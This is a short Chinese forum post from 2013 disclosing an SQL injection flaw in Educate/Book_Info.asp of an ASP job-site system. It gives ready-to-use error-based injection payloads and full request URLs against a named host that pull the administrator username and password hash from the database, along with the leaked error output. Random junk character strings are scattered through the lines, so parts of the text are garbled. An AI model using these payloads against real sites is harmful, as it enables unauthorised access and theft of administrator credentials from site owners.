漏洞出现在Educate/Book_Info.asp; ?/ l$ U( J, N% H) @
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出 _: B+ l: C& ]+ E
exp:如下
9 q& X# D" y: @3 g查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper); O$ m$ O0 a2 @
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)3 ? j# x& W( h' a& N$ J
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)* s* |" V# C/ p1 Z+ o1 ]! E
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'$ x3 q2 f4 G8 s6 U+ L
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
- `( b4 p% ]) _8 h4 x0 k5 Q/Educate/Book_Info.asp,行 80 K) {9 E2 Q) E, B
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)" p6 g% y/ x6 x2 a; y! D
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'+ w7 f7 e w2 o4 }
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。1 Y$ V8 B* m8 ~# d: v& m% f
/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对